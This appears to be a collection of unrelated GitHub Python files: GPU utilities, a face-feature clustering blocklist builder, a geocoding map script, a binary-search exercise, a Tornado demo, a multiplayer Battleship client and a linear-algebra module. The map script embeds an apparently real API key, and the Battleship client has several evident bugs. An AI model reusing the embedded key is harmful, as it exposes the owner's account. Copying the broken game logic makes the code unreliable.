1e6))\n\n# 计算gpu显存\ndef get_gpu_memory():\n import platform\n if 'Windows' != platform.system():\n import os\n os.system('nvidia-smi -q -d Memory | grep -A4 GPU | grep Free > tmp.txt')\n memory_gpu = [int(x.split()[2]) for x in open('tmp.txt', 'r').readlines()]\n os.system('rm tmp.txt')\n else:\n memory_gpu = False\n print(\"显存计算不支持windows\")\n return memory_gpu","repo_name":"emilyemliyM/msy1102","sub_path":"confusion_matrix.py","file_name":"confusion_matrix.py","file_ext":"py","file_size_in_byte":1145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25401609012","text":"from pymongo import MongoClient\nimport numpy as np\nfrom sklearn.cluster import DBSCAN\nfrom collections import defaultdict\nimport pickle\nfrom blocking import face_to_features\n\ncamera_count = 12\nmin_samples = 20\nmax_features = 1000\n\nclient = MongoClient()\nblocklist = defaultdict(list)\n\nfor camera_id in range(camera_count):\n print(f'analyzing camera {camera_id}')\n \n features = []\n for e in client.vibecheck.raw.find({'camera_id': str(camera_id)}):\n for face in e['faces']:\n features.append(face_to_features(face))\n \n print(f' face features: {len(features)}')\n if len(features) == 0:\n print(' skipping...')\n continue\n\n if len(features) > max_features:\n np.random.shuffle(features)\n features = features[:max_features]\n print(f' limited features: {max_features}')\n \n features = np.asarray(features)\n clusterer = DBSCAN(min_samples=min_samples)\n labels = clusterer.fit_predict(features)\n unique = np.unique(labels[labels != -1])\n \n print(f' unique clusters: {len(unique)}')\n if len(unique) == 0:\n print(' skipping...')\n continue\n \n for label in unique:\n in_group = features[labels == label]\n out_group = features[labels != label]\n mean = in_group.mean(0)\n\n try:\n farthest = np.sqrt((in_group - mean) ** 2).sum(1).max()\n print(' ', label, 'farthest', round(farthest, 2))\n except ValueError:\n print(' ', label, 'farthest error')\n\n try:\n nearest = np.sqrt((out_group - mean) ** 2).sum(1).min()\n print(' ', label, 'nearest', round(nearest, 2))\n except ValueError:\n print(' ', label, 'nearest error')\n \n blocklist[str(camera_id)].append(mean)\n\nprint('saving blocklist')\nwith open('blocklist.pkl', 'wb') as f:\n pickle.dump(dict(blocklist), f)\n","repo_name":"lmccart/vibe-check","sub_path":"face/build-blocklist.py","file_name":"build-blocklist.py","file_ext":"py","file_size_in_byte":1911,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"27936318098","text":"# Profile data on maps\n\nimport getProfileData as gPFD\n\nimport requests\nimport json\n\nimport folium\n\n\ndef getDataSet():\n profileDataset = gPFD.profileCleanData()\n print(profileDataset.info())\n\n return profileDataset\n\n\ndef get_coordinates():\n\n # setting up return value -\n locCordList = 'error'\n\n # getting dataset for processing location coordinates -\n getProfileSet = getDataSet()\n countPerLoc = getProfileSet['Current_Location'].value_counts().to_dict()\n\n getCordData = {}\n for keys in countPerLoc:\n # Make a request to the geocoding API\n setKeys = keys+\",India\"\n api_key = '8f93dd7094b440a99d8d146c7277c592' # Replace with your API key\n api_url = f'https://api.opencagedata.com/geocode/v1/json?key={api_key}&q={setKeys}'\n #print(keys, \":\", api_url)\n response = requests.get(api_url)\n data = json.loads(response.text)\n\n # Extract the coordinates from the API response\n if data['results']:\n latitude = data['results'][0]['geometry']['lat']\n longitude = data['results'][0]['geometry']['lng']\n getCordData.update({keys: [latitude, longitude]})\n locCordList = getCordData\n\n return locCordList\n\n\ndef getMapRender():\n # Create a folium map object\n map_html = 'error'\n getLocData = get_coordinates()\n\n dataCountCord = getDataSet()\n profileCount = dataCountCord['Current_Location'].value_counts().to_dict()\n\n widthSize = 250\n\n if len(getLocData) == 1:\n setFirstKey = getLocData.keys()\n popText = profileCount[setFirstKey]\n\n mapData = folium.Map(getLocData[setFirstKey], zoom_start=5)\n folium.Marker(getLocData[setFirstKey], popup=popText, max_width=widthSize).add_to(mapData)\n map_html = mapData.get_root().render()\n\n else:\n getLocDataList = list(getLocData.items())\n indexValSet = 0\n ikey, valueSet = list(getLocDataList[indexValSet])\n\n pop_text = ikey+\":\"+str(profileCount[ikey])\n\n mapData = folium.Map(valueSet, zoom_start=5)\n folium.Marker(valueSet, popup=pop_text, max_width=widthSize).add_to(mapData)\n\n counter = 0\n for keys in getLocData:\n if counter == 0:\n counter = counter + 1\n\n else:\n # Add data points to the map\n pop_text = keys+\":\"+str(profileCount[keys])\n\n folium.Marker(getLocData[keys], popup=pop_text, max_width=widthSize).add_to(mapData)\n counter = counter + 1\n\n # Render the map using folium's HTML iframe\n map_html = mapData.get_root().render()\n\n return map_html\n","repo_name":"newapp2023/testApp","sub_path":"plotProfileMaps.py","file_name":"plotProfileMaps.py","file_ext":"py","file_size_in_byte":2646,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72959718188","text":"import sys\n\nsys.stdin = open(\"input.txt\", \"rt\")\n\n# 1번 문제. 이분검색\n\n# '''\nn, m = map(int, input().split())\na = list(map(int, input().split()))\n\n# 정렬 (선택정렬)\nfor i in range(n):\n minimum = sys.maxsize # 시스템에서 지원하는 최대 값\n idx = i # 현재 위치\n for j in range(i+1, n): # i 뒤에서 가장 작은 값 찾음\n if a[j] < minimum:\n minimum = a[j]\n idx = j\n else:\n if a[idx] < a[i]: # 뒤에서 찾는 가작 작은 값이 a[i]보다 작으면 갑 교환\n a[i], a[idx] = a[idx], a[i]\n\n# 이분검색 # log(n)번만에 찾음.\ns = 0 # 시작 인덱스\ne = n - 1 # 끝 인덱스\nwhile True:\n half = s + ((e - s) // 2) # 중간 인덱스 (기준 인덱스)\n aim = a[half] # 중간 값\n if m == aim: # 현재 인덱스가 가리키는 값과 목표값이 같은 경우\n print(half + 1) # 인덱스이기 때문에 +1\n break\n elif m < aim: # 목표값이 현대 가리키는 값보다 작으면 끝 인덱스 변경\n e = half\n elif m > aim: # 목표값이 현대 가리키는 값보다 크면 시작 인덱스 변경\n s = half\n if abs(e - s) <= 1 : # 시작인덱스와 끝 인덱스가 붙어있으면 종료\n print(\"end!!!\")\n break\n# '''\n\n\n# 해설\nn, m = map(int, input().split())\na = list(map(int, input().split()))\na.sort()\nlt = 0\nrt = n - 1\nwhile lt <= rt:\n mid = (lt + rt) // 2\n if a[mid] == m:\n print(mid + 1)\n break\n elif a[mid] > m:\n rt = mid - 1\n else:\n lt = mid + 1\n\n\n\n","repo_name":"bansakdo/Algorithm","sub_path":"inflean/Section4/Question01.py","file_name":"Question01.py","file_ext":"py","file_size_in_byte":1821,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"16152183987","text":"\n# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\nimport tornado\nfrom tornado.gen import coroutine, sleep, multi\nfrom tornado.httpclient import AsyncHTTPClient\n\n# -------------------------------------------------- use tornado -------------------------------------------------------\n\nioloop = tornado.ioloop.IOLoop()\n\ndef _stop(future):\n ioloop.stop()\n\ndef run_until_complete(future, ioloop=ioloop):\n \"\"\"Keep running untill the future is done\"\"\"\n ioloop.add_future(future, _stop) \n ioloop.start()\n\n# ---------------------------------------------------------------------------------------------------------------------\n\n@coroutine\ndef producer1():\n print('---------1')\n yield sleep(3)\n print('---------2')\n yield sleep(2)\n print('---------1')\n\n@coroutine\ndef producer2():\n print('---------4')\n yield sleep(5)\n print('---------5')\n yield sleep(5)\n print('---------6')\n\n@coroutine\ndef producer3():\n print('---------7')\n yield sleep(4)\n print('---------8')\n yield sleep(1)\n print('---------9')\n\n@coroutine\ndef producer4():\n print('---------start request')\n http_client = AsyncHTTPClient()\n res = yield http_client.fetch('http://www.npr.org')\n # res = yield http_client.fetch('test.xxx.com') # when exception happens, the exception will be eaten inside, not raise to out !?\n print('---------response ok')\n print(res)\n yield sleep(2)\n print('---------haha')\n\n@coroutine\ndef runner():\n print('--------start--------')\n producer1() \n producer2()\n producer3()\n producer4() \n # those coroutines have already started, but not finished, need loop to resume execute later !!\n yield sleep(8) # change this time to 1/3/5/7/10 to see differency...(when loop stoped, coroutines won't be executed any more)\n print('--------stop--------')\n\n# yield从来只是 ·暂停/挂起· 当前协程\n# 是 @coroutine装饰器 内部已经调用了 generator的send方法了,已经将其后的协程扔给loop/或者直接开启某个异步函数在后台执行,\ndef main():\n run_until_complete(runner())\n ## or\n # run_until_complete(multi([producer1(), producer2(), producer3(), producer4()]))\n pass\n\nmain()\n\n\n","repo_name":"carvenski/tornado","sub_path":"tornado实例2.py","file_name":"tornado实例2.py","file_ext":"py","file_size_in_byte":2216,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"37"} +{"seq_id":"2082523565","text":"from import_and_color_size_setting import *\nfrom create_ai_ship_and_buttons import *\nfrom grid import Grid\nfrom drawing import *\nfrom shooting import check_hit_or_miss\nimport json\nimport time\nfrom client_conn_win import username\nfrom client_conn_win import on_message\nfrom client_conn_win import connect_to_server\nfrom client_conn_win import on_close\nfrom client_conn_win import window\n\n\n\n\ndef enemy_shot(ws,message):\n msg_json = json.loads(message)\n if msg_json[\"type\"] == \"PLAYER_CHANGED\":\n if msg_json[\"data\"][\"name\"] == \"Player2\":\n if msg_json[\"type\"] == \"SHOT_FIRED\":\n draw_from_dotted_set(dotted_set)\n draw_hit_blocks(hit_blocks)\n \n \n\n\ndef multiplayer(ws, message):\n msg_json = json.loads(message)\n ships_creation_not_decided = True\n ships_not_created = True\n drawing = False\n game_over = False\n computer_turn = False\n start = (0, 0)\n ship_size = (0, 0)\n\n rect_for_grids = (0, 0, size[0], upper_margin + 12 * block_size)\n rect_for_messages_and_buttons = (\n 0, upper_margin + 11 * block_size, size[0], 5 * block_size)\n message_rect_for_drawing_ships = (undo_button.rect_for_draw[0] + undo_button.rect_for_draw[2], upper_margin + 11 * block_size, size[0]-(\n undo_button.rect_for_draw[0] + undo_button.rect_for_draw[2]), 4 * block_size)\n message_rect_computer = (left_margin - 2 * block_size, upper_margin +\n 11 * block_size, 14 * block_size, 4 * block_size)\n message_rect_human = (left_margin + 15 * block_size, upper_margin +\n 11 * block_size, 10 * block_size, 4 * block_size)\n\n human_ships_to_draw = []\n human_ships_set = set()\n used_blocks_for_manual_drawing = set()\n num_ships_list = [0, 0, 0, 0]\n\n screen.fill(GREY)\n computer_grid = Grid(\"ENEMY\", 0)\n human_grid = Grid(username, 15)\n\n \n\n while connect_to_server(ws, message):\n if msg_json[\"type\"] == \"GAME_PHASE_CHANGED\":\n if msg_json[\"data\"][\"phase\"] == \"SETUP\": \n while ships_creation_not_decided:\n auto_button.draw_button()\n manual_button.draw_button()\n auto_button.change_color_on_hover()\n manual_button.change_color_on_hover()\n auto_button.print_message_for_button()\n\n mouse = pygame.mouse.get_pos()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n game_over = True\n ships_creation_not_decided = False\n ships_not_created = False\n # If AUTO button is pressed - create human ships automatically\n elif event.type == pygame.MOUSEBUTTONDOWN and auto_button.rect.collidepoint(mouse):\n human = AutoShips(15)\n human_ships_to_draw = human.ships\n human_ships_working = copy.deepcopy(human.ships)\n human_ships_set = human.ships_set\n ships_creation_not_decided = False\n ships_not_created = False\n elif event.type == pygame.MOUSEBUTTONDOWN and manual_button.rect.collidepoint(mouse):\n ships_creation_not_decided = False\n\n pygame.display.update()\n screen.fill(GREY, rect_for_messages_and_buttons)\n\n\n while ships_not_created:\n screen.fill(GREY, rect_for_grids)\n computer_grid = Grid(\"Enemy\", 0)\n human_grid = Grid(username, 15)\n mouse = pygame.mouse.get_pos()\n for event in pygame.event.get():\n if on_close():\n ships_not_created = False\n game_over = True\n pygame.QUIT\n ws.close()\n if event.type == pygame.MOUSEBUTTONDOWN:\n drawing = True\n x_start, y_start = event.pos\n start = x_start, y_start\n ship_size = (0, 0)\n if drawing and event.type == pygame.MOUSEMOTION:\n x_end, y_end = event.pos\n end = x_end, y_end\n ship_size = x_end - x_start, y_end - y_start\n elif drawing and event.type == pygame.MOUSEBUTTONUP:\n x_end, y_end = event.pos\n drawing = False\n ship_size = (0, 0)\n start_block = ((x_start - left_margin) // block_size + 1,\n (y_start - upper_margin) // block_size + 1)\n end_block = ((x_end - left_margin) // block_size + 1,\n (y_end - upper_margin) // block_size + 1)\n if start_block > end_block:\n start_block, end_block = end_block, start_block\n temp_ship = []\n if 15 < start_block[0] < 26 and 0 < start_block[1] < 11 and 15 < end_block[0] < 26 and 0 < end_block[1] < 11:\n screen.fill(GREY, message_rect_for_drawing_ships)\n if start_block[0] == end_block[0] and (end_block[1] - start_block[1]) < 4:\n for block in range(start_block[1], end_block[1]+1):\n temp_ship.append((start_block[0], block))\n elif start_block[1] == end_block[1] and (end_block[0] - start_block[0]) < 4:\n for block in range(start_block[0], end_block[0]+1):\n temp_ship.append((block, start_block[1]))\n else:\n show_message_at_rect_center(\n \"SHIP IS TOO LARGE\", message_rect_for_drawing_ships)\n else:\n show_message_at_rect_center(\n \"SHIP IS BEYOND YOUR GRID\", message_rect_for_drawing_ships)\n if temp_ship:\n temp_ship_set = set(temp_ship)\n if ship_is_valid(temp_ship_set, used_blocks_for_manual_drawing):\n if check_ships_numbers(temp_ship, num_ships_list):\n num_ships_list[len(temp_ship) - 1] += 1\n human_ships_to_draw.append(temp_ship)\n human_ships_set |= temp_ship_set\n update_used_blocks(\n temp_ship, used_blocks_for_manual_drawing.add)\n data = {\n \"type\": \"PLACE_SHIP\",\n \"data\": {\n \"x\": x_start,\n \"y\": y_start,\n \"length\": ship_size,\n \"direction\": ship_size\n }\n }\n ws.send(json.dumps(data))\n i += 1\n else:\n show_message_at_rect_center(\n f\"There already are enough of {len(temp_ship)} ships!\", message_rect_for_drawing_ships)\n else:\n show_message_at_rect_center(\n \"SHIPS ARE TOUCHING\", message_rect_for_drawing_ships)\n if len(human_ships_to_draw) == 10:\n ships_not_created = False\n human_ships_working = copy.deepcopy(human_ships_to_draw)\n screen.fill(GREY, rect_for_messages_and_buttons)\n pygame.draw.rect(screen, GREEN, (start, ship_size), 3)\n draw_ships(human_ships_to_draw)\n pygame.display.update()\n\n while not game_over:\n if msg_json[\"type\"] == \"GAME_PHASE_CHANGED\":\n if msg_json[\"data\"][\"phase\"] == \"IN_PROGRESS\":\n draw_ships(human_ships_to_draw)\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n game_over = True\n on_close()\n ws.close()\n if msg_json[\"type\"] == \"PLAYER_CHANGED\":\n if msg_json[\"data\"][\"name\"] == \"Player1\":\n while msg_json[\"data\"][\"name\"] == \"Player1\":\n show_message_at_rect_center(\"GAME STARTED! YOUR MOVE!\", message_rect_computer)\n if event.type == pygame.MOUSEBUTTONDOWN:\n x, y = event.pos\n if (left_margin < x < left_margin + 10 * block_size) and (\n upper_margin < y < upper_margin + 10 * block_size):\n fired_block = ((x - left_margin) // block_size + 1,\n (y - upper_margin) // block_size + 1)\n \n data = {\n \"type\": \"FIRE_SHOT\",\n \"data\": {\n \"x\": (x - left_margin) // block_size + 1,\n \"y\": (y - upper_margin) // block_size + 1,\n }\n }\n ws.send(json.dumps(data))\n time.sleep(2.5)\n \n if msg_json[\"data\"] == \"SHOT_FIRED\":\n if msg_json[\"type\"][\"result\"] == \"MISS\":\n draw_from_dotted_set(dotted_set)\n if msg_json[\"type\"] == \"PLAYER_CHANGED\":\n if msg_json[\"data\"][\"name\"] == \"Player2\":\n enemy_shot()\n if msg_json[\"type\"] == \"SHOT_FIRED\":\n if msg_json[\"data\"][\"result\"] == \"HIT\":\n draw_hit_blocks(hit_blocks)\n screen.fill(GREY, message_rect_computer)\n show_message_at_rect_center(\n f\"Your last shot: {LETTERS[fired_block[0]-1] + str(fired_block[1])}\", message_rect_computer, color=BLACK)\n\n else:\n show_message_at_rect_center(\"Your shot is outside of grid\", message_rect_computer)\n\n if not human_ships_set:\n show_message_at_rect_center(\n \"YOU LOST!\", (0, 0, size[0], size[1]), game_over_font)\n game_over = True\n pygame.display.update()\n\n while on_close():\n\n screen.fill(LIGHT_GRAY, rect_for_messages_and_buttons)\n play_again_button.draw_button()\n play_again_button.print_message_for_button()\n play_again_button.change_color_on_hover()\n quit_game_button.draw_button()\n quit_game_button.change_color_on_hover()\n\n mouse = pygame.mouse.get_pos()\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n sys.exit()\n elif event.type == pygame.MOUSEBUTTONDOWN and play_again_button.rect.collidepoint(mouse):\n window.mainloop()\n elif event.type == pygame.MOUSEBUTTONDOWN and quit_game_button.rect.collidepoint(mouse):\n ws.close()\n pygame.quit()\n sys.exit()\n pygame.display.update()\n\n\nmultiplayer()\n","repo_name":"07Hollow/Battleship_with_Multiplayer","sub_path":"multiplayer.py","file_name":"multiplayer.py","file_ext":"py","file_size_in_byte":13174,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"20222484857","text":"\"\"\"\nProvides an assortment of more advanced linear algebra tools to work\n with `Vector` and `Matrix` objects.\n\"\"\"\n\nfrom __future__ import annotations\n\nfrom fractions import Fraction\nfrom math import sqrt, acos\nfrom typing import Iterable, Literal, overload\nfrom functools import reduce\nfrom operator import mul as mul_operator\n\nfrom ._errors import (\n DimensionMismatchError,\n LinearDependenceError,\n RectangularMatrixError,\n)\nfrom ._matrix import Matrix\nfrom ._vector import Vector\n\n__all__ = (\n \"cross\",\n \"determinant\",\n \"distance\",\n \"homogenous\",\n \"identity\",\n \"inverse\",\n \"join_vectors\",\n \"laplace_expansion\",\n \"limit_denominator\",\n \"magnitude\",\n \"matrix_power\",\n \"normalize\",\n \"orthogonalize\",\n \"rank\",\n \"row_reduce\",\n \"transpose\",\n \"split_vectors\",\n)\n\n\ndef angle(\n direction_a: Vector,\n direction_b: Vector,\n) -> float:\n \"\"\"\n Calculates the angle between two vectors in radians.\n\n Arguments\n - direction_a: The \"starting\" direction.\n - direction_b: The \"ending\" direction.\n\n Possible Errors\n - DimensionMismatchError: If `direction_a` and `direction_b` do not\n have the same length.\n\n Notes\n - May introduce floating point errors.\n \"\"\"\n if len(direction_a) != len(direction_b):\n raise DimensionMismatchError(\n f\"'a' length ({len(direction_a)}) \"\n f\"does not equal 'b' length ({len(direction_b)})\"\n )\n return acos(\n (direction_a @ direction_b)\n / (magnitude(direction_a) * magnitude(direction_b))\n )\n\n\ndef cross(\n *vectors: Vector,\n) -> Vector:\n \"\"\"\n Calculates a vector that is orthogonal to every given vector, in the\n case of exactly two 3-dimensional inputs, this is the cross\n product.\n\n Arguments\n - *vectors: The collection of vectors to cross (the number of\n vectors) given must be one less than the length of each vector.\n\n Possible Errors\n - ValueError: If the vectors given for `vectors` are not all the\n same length _n_, or if not exactly _n_-1 vectors were given.\n \"\"\"\n if len(vectors) <= 0:\n raise ValueError(\"exactly n-1 n-dimensional vectors must be given\")\n v_len = len(vectors[0])\n for vector in vectors:\n if len(vector) != v_len:\n raise DimensionMismatchError(\n \"all given vectors must have the same length\"\n )\n if len(vectors) != v_len - 1:\n raise ValueError(\"exactly n-1 n-dimensional vectors must be given\")\n matrix = join_vectors(homogenous(v_len, 1), *vectors, orientation=\"row\")\n return Vector(\n coefficient * determinant(matrix)\n for matrix, coefficient in laplace_expansion(matrix)\n )\n\n\ndef determinant(\n matrix: Matrix,\n) -> Fraction:\n \"\"\"\n Calculates the determinant of a matrix, which represents the scaling\n factor a matrix would apply when acting as a linear\n transformation.\n\n Arguments\n - matrix: The matrix for which the determinant is to be calculated.\n\n Possible Errors\n - RectangularMatrixError: If `matrix` is not a square matrix.\n \"\"\"\n if matrix.shape[0] != matrix.shape[1]:\n raise RectangularMatrixError(\n \"Determinants are only defined for square \"\n \"matrices, this matrix has a shape of \"\n f\"({matrix.shape[0]},{matrix.shape[1]})\"\n )\n if matrix.shape == (1, 1):\n return matrix[0, 0]\n if matrix.shape == (2, 2):\n return (matrix[0, 0] * matrix[1, 1]) - (matrix[1, 0] * matrix[0, 1])\n if matrix.shape == (3, 3):\n return (\n (matrix[0, 0] * matrix[1, 1] * matrix[2, 2])\n + (matrix[0, 1] * matrix[1, 2] * matrix[2, 0])\n + (matrix[0, 2] * matrix[1, 0] * matrix[2, 1])\n - (matrix[0, 2] * matrix[1, 1] * matrix[2, 0])\n - (matrix[0, 1] * matrix[1, 0] * matrix[2, 2])\n - (matrix[0, 0] * matrix[1, 2] * matrix[2, 1])\n )\n upper, sign = _ref(matrix)\n return reduce(mul_operator, upper.diagonal, Fraction(sign))\n\n\ndef distance(\n point_a: Vector,\n point_b: Vector,\n) -> float:\n \"\"\"\n Calculates the straight-line distance between two _n_-dimensional\n points given by vectors.\n\n Arguments\n - point_a: The \"starting\" point.\n - point_b: The \"ending\" point.\n\n Possible Errors\n - DimensionMismatchError: If `point_a` and `point_b` do not have the\n same length.\n\n Notes\n - May introduce floating point errors.\n \"\"\"\n if len(point_a) != len(point_b):\n raise DimensionMismatchError(\n f\"'a' length ({len(point_a)}) \"\n f\"does not equal 'b' length ({len(point_b)})\"\n )\n difference = point_a - point_b\n return sqrt(difference @ difference)\n\n\n@overload\ndef homogenous(\n shape: tuple[int, int],\n value: float | Fraction = 0,\n) -> Matrix:\n ...\n\n\n@overload\ndef homogenous(\n shape: int,\n value: float | Fraction = 0,\n) -> Vector:\n ...\n\n\ndef homogenous(\n shape: tuple[int, int] | int,\n value: float | Fraction = 0,\n) -> Vector | Matrix:\n \"\"\"\n Constructor that creates a matrix or vector of a given shape which\n has all elements equal to one another.\n\n Arguments\n - shape: The row-column shape of the desired matrix, or length of\n the desired vector.\n - value: The value with which to fill the matrix.\n Optional, defaults to 0.\n \"\"\"\n if isinstance(shape, tuple):\n return Matrix(\n (value for _ in range(shape[1])) for _ in range(shape[0])\n )\n else: # if isinstance(shape, int):\n return Vector(value for _ in range(shape))\n\n\ndef identity(\n side_length: int,\n) -> Matrix:\n \"\"\"\n Creates and returns a square identity matrix.\n\n Arguments\n - side_length: The side-length of the desired matrix.\n\n Possible Errors\n - ValueError: If `side_length` is 0 (or less).\n \"\"\"\n if side_length <= 0:\n raise ValueError(\"The size of an identity matrix must be at least 1\")\n return Matrix(\n (1 if i == j else 0 for i in range(side_length))\n for j in range(side_length)\n )\n\n\ndef inverse(\n matrix: Matrix,\n) -> Matrix:\n \"\"\"\n Inverts a matrix with respect to matrix multiplication.\n\n Arguments\n - matrix: The matrix to invert.\n\n Possible Errors\n - RectangularMatrixError: If `matrix` is not a square matrix.\n - LinearDependenceError: If `matrix` is non-invertible.\n \"\"\"\n side_len = matrix.shape[0]\n if side_len != matrix.shape[1]:\n raise RectangularMatrixError(\n \"inversions are only defined for square \"\n \"matrices, this matrix has a shape of \"\n f\"({matrix.shape[0]},{matrix.shape[1]})\"\n )\n reduction = row_reduce(matrix | identity(side_len))\n inversion = reduction[:, side_len:]\n for i in reduction.diagonal:\n if i != Fraction(1):\n raise LinearDependenceError(\n \"cannot invert linearly dependent matrices\"\n )\n return inversion\n\n\ndef join_vectors(\n *vectors: Vector,\n orientation: Literal[\"col\", \"row\"] = \"col\",\n) -> Matrix:\n \"\"\"\n Concatenates _m_ vectors of dimension _n_ into either an _m_ by _n_\n matrix, or an _n_ by _m_ matrix.\n\n Arguments\n - *vectors: The vectors to join.\n - orientation: Whether to interpret the given vectors as columns, or\n as rows of the desired matrix.\n Optional, defaults to 'col'.\n\n Possible Errors\n - ValueError: If no vectors were given.\n - DimensionMismatchError: If not all of the given vectors have the\n same length.\n \"\"\"\n if len(vectors) <= 0:\n raise ValueError(\"at least one vector must be given\")\n v_len = len(vectors[0])\n for vector in vectors:\n if len(vector) != v_len:\n raise DimensionMismatchError(\n \"all vectors must have the same length to be \"\n \"joined into a matrix\"\n )\n if orientation == \"col\":\n return Matrix(row for row in zip(*vectors))\n else: # if orientation == \"row\":\n return Matrix(vectors)\n\n\ndef laplace_expansion(\n matrix: Matrix,\n) -> Iterable[tuple[Matrix, Fraction]]:\n \"\"\"\n Lazily yields the cofactor expansion of a matrix along its first row\n as a matrix-coefficient tuple.\n\n Arguments\n - matrix: The matrix to expand.\n\n Possible Errors\n - RectangularMatrixError: If `matrix` is not a square matrix.\n \"\"\"\n if matrix.shape[0] != matrix.shape[1]:\n raise RectangularMatrixError(\n \"Laplace expansions are only defined for square \"\n \"matrices, this matrix has a shape of \"\n f\"({matrix.shape[0]},{matrix.shape[1]})\"\n )\n if matrix.shape[0] < 2:\n raise ValueError(\n \"matrices must not be smaller than (2,2) for Laplace expansion\"\n )\n for i in range(matrix.shape[1]):\n yield (\n Matrix(\n (item for c, item in enumerate(row) if c != i)\n for r, row in enumerate(matrix)\n if r != 0\n ),\n (1 if i % 2 == 0 else -1) * matrix[0, i],\n )\n\n\n@overload\ndef limit_denominator(\n arg: Vector,\n max_denominator: int,\n) -> Vector:\n ...\n\n\n@overload\ndef limit_denominator(\n arg: Matrix,\n max_denominator: int,\n) -> Matrix:\n ...\n\n\ndef limit_denominator(\n arg: Vector | Matrix,\n max_denominator: int,\n) -> Vector | Matrix:\n \"\"\"\n Creates a new instance of the argument with all fraction\n denominators set to some maximum amount.\n\n Arguments\n - arg: The matrix or vector to operate on.\n - max_denominator: The highest possible denominator (actual may be\n lower).\n\n Possible Errors\n - ZeroDivisionError: If max_denominator is 0.\n \"\"\"\n\n if max_denominator == 0:\n raise ZeroDivisionError(\n \"maximum denominator must be a nonzero positive integer\"\n )\n if isinstance(arg, Matrix):\n return Matrix(\n (item.limit_denominator(max_denominator) for item in row)\n for row in arg\n )\n else: # if isinstance(arg, Vector):\n return Vector(item.limit_denominator(max_denominator) for item in arg)\n\n\ndef magnitude(\n vector: Vector,\n) -> float:\n \"\"\"\n Calculates the magnitude (length) of a given vector.\n\n Arguments\n - vector: The vector for which the magnitude must be calculated.\n\n Notes\n - May introduce floating point errors.\n \"\"\"\n return sqrt(sum((n * n for n in vector)))\n\n\ndef matrix_power(\n matrix: Matrix,\n power: int,\n) -> Matrix:\n \"\"\"\n Calculates the given integer power of a matrix by repeated matrix\n multiplication.\n\n Arguments\n - matrix: The matrix to raise to the given power.\n - power: The power to raise the given matrix to.\n\n Possible Errors\n - RectangularMatrixError: If `matrix` is not a square matrix.\n \"\"\"\n side_len = matrix.shape[0]\n if not side_len == matrix.shape[1]:\n raise RectangularMatrixError(\n \"only square matrices may be raised to a power\"\n )\n\n def fast_pow(identity_: Matrix, matrix_: Matrix, power_: int) -> Matrix:\n if power_ == 0:\n return identity_\n half_power, remainder = divmod(power_, 2)\n result = fast_pow(identity_, matrix_, half_power)\n result @= result\n return matrix_ @ result if remainder != 0 else result\n\n identity_mat = identity(side_len)\n return fast_pow(identity_mat, matrix, power)\n\n\ndef normalize(\n vector: Vector,\n) -> Vector:\n \"\"\"\n Calculates an approximately normal vector.\n\n Arguments\n - vector: The vector to normalize.\n\n Possible Errors\n - ZeroDivisionError: If the magnitude of the given vector is 0.\n\n Notes\n - An exact normal cannot be calculated since normalization involves\n scaling by a possibly irrational factor. This may introduce\n floating point errors.\n \"\"\"\n mag = magnitude(vector)\n if mag == 0:\n raise ZeroDivisionError(\n \"vectors with magnitude 0 cannot be normalized\"\n )\n else:\n return Vector(n / mag for n in vector)\n\n\ndef orthogonalize(\n *vectors: Vector,\n) -> list[Vector]:\n \"\"\"\n Using the Gram-Schmidt process, creates an orthogonal basis from a\n set of vectors.\n\n Arguments\n - *vectors: The set of vectors to use as a non-orthogonal basis.\n\n Possible Errors\n - ValueError: If not all given vectors have the same length, or\n if not exactly *n* vectors are given, where *n* represents the\n length of each vector.\n - LinearDependenceError: If the given vectors cannot form a linearly\n independent basis.\n\n Notes\n - The returned vectors are not normalized, they must be manually\n normalized if an orthonormal basis is sought.\n \"\"\"\n\n # Video reference I used:\n # https://www.youtube.com/watch?v=zHbfZWZJTGc\n\n if len(vectors) <= 0:\n raise ValueError(\"exactly n n-dimensional vectors must be given\")\n v_len = len(vectors[0])\n for vector in vectors:\n if len(vector) != v_len:\n raise DimensionMismatchError(\n \"all given vectors must have the same length\"\n )\n if len(vectors) != v_len:\n raise ValueError(\"exactly n n-dimensional vectors must be given\")\n u_vectors: list[Vector] = []\n try:\n for k in range(len(vectors)):\n u_vectors.append(vectors[k])\n u_vectors[k] -= sum(\n (\n (\n u_vectors[i]\n * (vectors[k] @ u_vectors[i])\n / (u_vectors[i] @ u_vectors[i])\n )\n for i in range(k)\n ),\n start=homogenous(v_len, 0),\n )\n except ZeroDivisionError:\n raise LinearDependenceError(\n \"cannot orthogonalize linearly dependent vectors\"\n )\n\n return u_vectors\n\n\ndef rank(\n matrix: Matrix,\n) -> int:\n \"\"\"\n Calculates the rank of a given matrix.\n\n Arguments\n - matrix: The matrix the rank is to be calculated from.\n \"\"\"\n matrix_ref = row_reduce(matrix, \"ref\")\n rank_count = 0\n for i in range(min(matrix_ref.shape)):\n if matrix_ref[i, i] == 0:\n break\n else:\n rank_count += 1\n return rank_count\n\n\ndef row_reduce(\n matrix: Matrix,\n form: Literal[\"rref\", \"ref\"] = \"rref\",\n) -> Matrix:\n \"\"\"\n Computes a row-echelon or reduced row-echelon form matrix by row\n reduction.\n\n Arguments\n - matrix: The matrix to row-reduce.\n - form: Whether to compute the reduced row-echelon form by\n Gauss-Jordan elimination, or compute a non-reduced row-echelon\n form by simple Gaussian elimination.\n Optional, defaults to 'rref'.\n \"\"\"\n if form == \"rref\":\n return _rref(matrix)\n else: # if form == \"ref\":\n return _ref(matrix)[0]\n\n\ndef split_vectors(\n matrix: Matrix,\n orientation: Literal[\"col\", \"row\"] = \"col\",\n) -> Iterable[Vector]:\n \"\"\"\n Lazily gets each row or column from a matrix as a vector.\n\n Arguments\n - matrix: The matrix to separate into vectors.\n - orientation: Whether to interpret the given matrix as a collection\n of columns, or a list of rows.\n Optional, defaults to 